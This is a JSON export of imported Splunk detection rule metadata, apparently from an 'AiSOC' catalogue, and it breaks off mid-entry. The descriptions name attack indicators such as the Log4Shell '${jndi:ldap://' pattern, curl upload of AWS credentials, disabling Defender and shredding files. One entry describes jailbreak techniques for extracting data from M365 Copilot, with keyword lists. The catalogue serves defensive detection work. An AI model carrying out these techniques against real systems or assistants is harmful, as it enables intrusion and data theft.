"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-data-transfer-size-limits-via-split-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c03d4a49-cf9d-435b-86e9-c6f8c9b6c42e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_data_transfer_size_limits_via_split_syscall.yml" } }, { "id": "splunk-security-content-c04ef40c-72da-11ec-8eac-acde48001122", "type": "detection", "name": "Linux Possible Ssh Key File Creation", "description": "The following analytic detects the creation of SSH key files in the ~/.ssh/ directory. It leverages filesystem data to identify new files in this specific path. This activity is significant because threat actors often create SSH keys to gain persistent access and escalate privileges on a compromised host. If confirmed malicious, this could allow attackers to remotely access the machine using the OpenSSH daemon service, leading to potential unauthorized control and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-ssh-key-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c04ef40c-72da-11ec-8eac-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_ssh_key_file_creation.yml" } }, { "id": "splunk-security-content-c051b68c-60f7-4022-b3ad-773bec7a225b", "type": "detection", "name": "Windows Process Writing File to World Writable Path", "description": "The following analytic identifies a process writing a .txt file to a world writable path. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on file creation events within specific directories. This activity is significant as adversaries often use such techniques to deliver payloads to a system, which is uncommon for legitimate processes. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-writing-file-to-world-writable-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c051b68c-60f7-4022-b3ad-773bec7a225b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_writing_file_to_world_writable_path.yml" } }, { "id": "splunk-security-content-c068d53f-6aaa-4558-8011-3734df878266", "type": "detection", "name": "O365 Application Registration Owner Added", "description": "The following analytic identifies instances where a new owner is assigned to an application registration within an Azure AD and Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in owner assignments within the AzureActiveDirectory workload. This activity is significant because assigning a new owner to an application registration can grant significant control over the application's configuration, permissions, and behavior. If confirmed malicious, an attacker could modify the application's settings, permissions, and behavior, leading to unauthorized data access, privilege escalation, or the introduction of malicious behavior within the application's operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-application-registration-owner-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c068d53f-6aaa-4558-8011-3734df878266", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_application_registration_owner_added.yml" } }, { "id": "splunk-security-content-c07c7138-edf5-4a16-8b24-3842599235bf", "type": "detection", "name": "Windows RMM Named Pipe", "description": "The following analytic detects the creation or connection to known suspicious named pipes, which is a technique often used by offensive tools.\nIt leverages Sysmon EventCodes 17 and 18 to identify known default pipe names used by RMM tools.\nIf confirmed malicious, this could allow an attacker to abuse these to potentially gain persistence, command and control, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rmm-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c07c7138-edf5-4a16-8b24-3842599235bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rmm_named_pipe.yml" } }, { "id": "splunk-security-content-c08014de-cc5a-42de-9775-76ecd5b37bbd", "type": "detection", "name": "Windows Renamed Powershell Execution", "description": "The following analytic identifies instances where the PowerShell executable has been renamed and executed under an alternate filename. This behavior is commonly associated with attempts to evade security controls or bypass logging mechanisms that monitor standard PowerShell usage. While rare in legitimate environments, renamed PowerShell binaries are frequently observed in malicious campaigns leveraging Living-off-the-Land Binaries (LOLBins) and fileless malware techniques. This detection flags executions of PowerShell where the process name does not match the default powershell.exe or pwsh.exe, especially when invoked from unusual paths or accompanied by suspicious command-line arguments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-renamed-powershell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c08014de-cc5a-42de-9775-76ecd5b37bbd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_renamed_powershell_execution.yml" } }, { "id": "splunk-security-content-c0c5a479-bf57-4ca0-af3a-4c7081e5ba05", "type": "detection", "name": "Windows Credentials from Password Stores Creation", "description": "The following analytic detects the execution of the Windows OS tool cmdkey.exe, which is used to create stored usernames, passwords, or credentials. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because cmdkey.exe is often abused by post-exploitation tools and malware, such as Darkgate, to gain unauthorized access. If confirmed malicious, this behavior could allow attackers to escalate privileges and maintain persistence on the targeted host, facilitating further attacks and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0c5a479-bf57-4ca0-af3a-4c7081e5ba05", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_creation.yml" } }, { "id": "splunk-security-content-c0d810f4-230c-44ea-b703-989da02ff145", "type": "detection", "name": "Linux MySQL Privilege Escalation", "description": "The following analytic detects the execution of MySQL commands with elevated privileges using sudo, which can lead to privilege escalation. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential misuse of MySQL to execute system commands as root, which could allow an attacker to gain root shell access. If confirmed malicious, this could result in full control over the affected system, leading to severe security breaches and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-mysql-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0d810f4-230c-44ea-b703-989da02ff145", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_mysql_privilege_escalation.yml" } }, { "id": "splunk-security-content-c0d89118-3f89-4cd7-8140-1f39e7210681", "type": "detection", "name": "Windows Credentials Access via VaultCli Module", "description": "The following analytic detects potentially abnormal interactions with VaultCLI.dll, particularly those initiated by processes located in publicly writable Windows folder paths. The VaultCLI.dll module allows processes to extract credentials from the Windows Credential Vault. It was seen being abused by information stealers such as Meduza. The analytic monitors suspicious API calls, unauthorized credential access patterns, and anomalous process behaviors indicative of malicious activity. By leveraging a combination of signature-based detection and behavioral analysis, it effectively flags attempts to misuse the vault for credential theft, enabling swift response to protect sensitive user data and ensure system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-access-via-vaultcli-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0d89118-3f89-4cd7-8140-1f39e7210681", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_access_via_vaultcli_module.yml" } }, { "id": "splunk-security-content-c0e5dd5a-2117-41d5-a04c-82a762a86a38", "type": "detection", "name": "Windows New Custom Security Descriptor Set On EventLog Channel", "description": "The following analytic detects suspicious modifications to the EventLog security descriptor registry value for defense evasion. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"CustomSD\" value within the \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Eventlog\\\\CustomSD\" path. This activity is significant as changes to the access permissions of the event log could blind security products and help attackers evade defenses. If confirmed malicious, this could allow attackers to block users and security products from viewing, ingesting and interacting event logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-custom-security-descriptor-set-on-eventlog-channel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0e5dd5a-2117-41d5-a04c-82a762a86a38", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_custom_security_descriptor_set_on_eventlog_channel.yml" } }, { "id": "splunk-security-content-c0ed2aca-5666-45b3-813f-ddfac3f3eda0", "type": "detection", "name": "Windows MOVEit Transfer Writing ASPX", "description": "The following analytic detects the creation of new ASPX files in the MOVEit Transfer application's \"wwwroot\" directory. It leverages endpoint data on process and filesystem activity to identify processes responsible for creating these files. This activity is significant as it may indicate exploitation of a critical zero-day vulnerability in MOVEit Transfer, used by threat actors to install malicious ASPX files. If confirmed malicious, this could lead to exfiltration of sensitive data, including user credentials and file metadata, posing a severe risk to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-moveit-transfer-writing-aspx.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0ed2aca-5666-45b3-813f-ddfac3f3eda0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_moveit_transfer_writing_aspx.yml" } }, { "id": "splunk-security-content-c0ee37bb-ed43-4632-8e38-060fba80b0b2", "type": "detection", "name": "M365 Copilot Information Extraction Jailbreak Attack", "description": "Detects M365 Copilot information extraction jailbreak attacks that attempt to obtain sensitive, classified, or comprehensive data through various social engineering techniques including fictional entity impersonation, bulk data requests, and privacy bypass attempts. The detection searches exported eDiscovery prompt logs for extraction keywords like \"transcendent,\" \"tell me everything,\" \"confidential,\" \"dump,\" \"extract,\" \"reveal,\" and \"bypass\" in the Subject_Title field, categorizing each attempt by extraction type and assigning severity levels (CRITICAL for classified/proprietary data, HIGH for bulk extraction or privacy bypass). Prompts are further analyzed for compound risk patterns such as \"Confidential+Extraction\" or \"Bulk_Request+Bypass,\" filtering out low-severity cases to surface the most dangerous attempts to exfiltrate sensitive organizational information through AI manipulation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-information-extraction-jailbreak-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c0ee37bb-ed43-4632-8e38-060fba80b0b2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_information_extraction_jailbreak_attack.yml" } }, { "id": "splunk-security-content-c11f2b57-92c1-4cd2-b46c-064eafb833ac", "type": "detection", "name": "MacOS plutil", "description": "The following analytic detects the usage of the `plutil` command to modify plist files on macOS systems. It leverages osquery to monitor process events, specifically looking for executions of `/usr/bin/plutil`. This activity is significant because adversaries can use `plutil` to alter plist files, potentially adding malicious binaries or command-line arguments that execute upon user logon or system startup. If confirmed malicious, this could allow attackers to achieve persistence, execute arbitrary code, or escalate privileges, posing a significant threat to the system's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1647" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-plutil.yaml", "provenance": { "source": "splunk/security_content", "source_id": "c11f2b57-92c1-4cd2-b46c-064eafb833ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_plutil.yml" } }, { "id": "splunk-security-content-c137bfe8-6036-4cff-b77b-4e327dd0a1cf", "type": "detection", "name": "Windows Proxy Via Netsh", "description": "The following analytic identifies the use of netsh.exe to configure a connection proxy, which can be leveraged for persistence by executing a helper DLL. It detects this activity by analyzing process creation events from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"portproxy\" and \"v4tov4\" parameters. This activity is significant because it indicates potential unauthorized network configuration changes, which could be used to maintain persistence or redirect network traffic. If confirmed malicious, this could allow an attacker to maintain covert access or manipulate network communications, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-proxy-via-netsh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c137bfe8-6036-4cff-b77b-4e327dd0a1cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_proxy_via_netsh.yml" } }, { "id": "splunk-security-content-c13b3d74-6b63-4db5-a841-4206f0370077", "type": "detection", "name": "Windows Service Create with Tscon", "description": "The following analytic detects potential RDP Hijacking attempts by identifying the creation of a Windows service using sc.exe with a binary path that includes tscon.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant as it indicates an attacker may be trying to hijack a disconnected RDP session, posing a risk of unauthorized access. If confirmed malicious, the attacker could gain control over an existing user session, leading to potential data theft or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1563.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-with-tscon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c13b3d74-6b63-4db5-a841-4206f0370077", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_with_tscon.yml" } }, { "id": "splunk-security-content-c1400ea2-6257-11ec-ad49-acde48001122", "type": "detection", "name": "Linux Change File Owner To Root", "description": "The following analytic detects the use of the 'chown' command to change a file owner to 'root' on a Linux system. It leverages Endpoint Detection and Response (EDR) telemetry, specifically monitoring command-line executions and process details. This activity is significant as it may indicate an attempt to escalate privileges by adversaries, malware, or red teamers. If confirmed malicious, this action could allow an attacker to gain root-level access, leading to full control over the compromised host and potential persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-change-file-owner-to-root.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1400ea2-6257-11ec-ad49-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_change_file_owner_to_root.yml" } }, { "id": "splunk-security-content-c148a894-dd93-11eb-bf2a-acde48001122", "type": "detection", "name": "Powershell Disable Security Monitoring", "description": "The following analytic identifies attempts to disable Windows Defender\nreal-time behavior monitoring via PowerShell commands. It detects the use of specific\n`Set-MpPreference` parameters that disable various security features. This activity\nis significant as it is commonly used by malware such as RATs, bots, or Trojans\nto evade detection by disabling antivirus protections. If confirmed malicious, this\naction could allow an attacker to operate undetected, leading to potential data\nexfiltration, further system compromise, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-disable-security-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c148a894-dd93-11eb-bf2a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_disable_security_monitoring.yml" } }, { "id": "splunk-security-content-c16c4899-d3f7-461b-92c2-cc0ef5758855", "type": "detection", "name": "Cisco Isovalent - Curl Execution With Insecure Flags", "description": "The following analytic detects the execution of curl commands with insecure flags within the Cisco Isovalent environment. It identifies this activity by monitoring process execution logs for curl commands that use the -k or --insecure flags. This behavior is significant for a SOC as it could allow an attacker to bypass SSL/TLS verification, potentially exposing the Kubernetes infrastructure to man-in-the-middle attacks. If confirmed malicious, this activity could lead to data interception, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-curl-execution-with-insecure-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c16c4899-d3f7-461b-92c2-cc0ef5758855", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___curl_execution_with_insecure_flags.yml" } }, { "id": "splunk-security-content-c184f12e-5c90-11ec-bf1f-497c9a704a72", "type": "detection", "name": "Log4Shell JNDI Payload Injection Attempt", "description": "The following analytic identifies attempts to inject Log4Shell JNDI payloads via web calls. It leverages the Web datamodel and uses regex to detect patterns like `${jndi:ldap://` in raw web event data, including HTTP headers. This activity is significant because it targets vulnerabilities in Java web applications using Log4j, such as Apache Struts and Solr. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to full system compromise. Immediate investigation is required to determine if the attempt was successful and to mitigate any potential exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/log4shell-jndi-payload-injection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c184f12e-5c90-11ec-bf1f-497c9a704a72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/log4shell_jndi_payload_injection_attempt.yml" } }, { "id": "splunk-security-content-c187ce2c-c88e-4cec-8a1c-607ca0dedd78", "type": "detection", "name": "Windows Multiple NTLM Null Domain Authentications", "description": "The following analytic detects when a device is the target of numerous NTLM authentications using a null domain. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to a domain joined Windows device from a non-domain device. This activity may also generate a large number of EventID 4776 events in tandem, however these events will not indicate the attacker or target device", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-ntlm-null-domain-authentications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c187ce2c-c88e-4cec-8a1c-607ca0dedd78", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_ntlm_null_domain_authentications.yml" } }, { "id": "splunk-security-content-c1952cf1-643c-4965-82de-11c067cbae76", "type": "detection", "name": "Linux Shred Overwrite Command", "description": "The following analytic detects the execution of the 'shred' command on a Linux machine, which is used to overwrite files to make them unrecoverable. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because the 'shred' command can be used in destructive attacks, such as those seen in the Industroyer2 malware targeting energy facilities. If confirmed malicious, this activity could lead to the permanent destruction of critical files, severely impacting system integrity and data availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-shred-overwrite-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1952cf1-643c-4965-82de-11c067cbae76", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_shred_overwrite_command.yml" } }, { "id": "splunk-security-content-c1b7abca-55cb-4a39-bdfb-e28c1c12745f", "type": "detection", "name": "Linux Auditd Preload Hijack Via Preload File", "description": "The following analytic detects suspicious preload hijacking via the `preload` file, which may indicate an attacker's attempt to intercept or manipulate library loading processes.\nThe `preload` file can be used to force the loading of specific libraries before others, potentially allowing malicious code to execute or alter application behavior.\nBy monitoring for unusual or unauthorized modifications to the `preload` file, this analytic helps identify attempts to hijack preload mechanisms, enabling security teams to investigate and address potential threats to system integrity and security.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-preload-hijack-via-preload-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1b7abca-55cb-4a39-bdfb-e28c1c12745f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_preload_hijack_via_preload_file.yml" } }, { "id": "splunk-security-content-c1bc706a-0025-4814-ad30-288f38865036", "type": "detection", "name": "PingID Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within a PingID environment. It triggers when 10 or more MFA prompts fail within 10 minutes, using JSON logs from PingID. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. If confirmed malicious, this could lead to unauthorized access, as the user might eventually accept the fraudulent request, compromising the security of the account and potentially the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1bc706a-0025-4814-ad30-288f38865036", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-c1de2d9a-0c02-4bb4-a49a-510c6e9cf2bf", "type": "detection", "name": "Linux Curl Upload File", "description": "The following analytic detects the use of the curl command with specific switches (-F, --form, --upload-file, -T, -d, --data, --data-raw, -I, --head) to upload AWS credentials or configuration files to a remote destination. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an attempt to exfiltrate sensitive AWS credentials, a technique known to be used by the TeamTNT group. If confirmed malicious, this could lead to unauthorized access and potential compromise of AWS resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-curl-upload-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1de2d9a-0c02-4bb4-a49a-510c6e9cf2bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_curl_upload_file.yml" } }, { "id": "splunk-security-content-c1eea697-99ed-44c2-9b70-d8935464c499", "type": "detection", "name": "Linux Hardware Addition SwapOff", "description": "The following analytic detects the execution of the \"swapoff\" command, which disables the swapping of paging devices on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because disabling swap can be a tactic used by malware, such as Awfulshred, to evade detection and hinder forensic analysis. If confirmed malicious, this action could allow an attacker to manipulate system memory management, potentially leading to data corruption, system instability, or evasion of memory-based detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-hardware-addition-swapoff.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 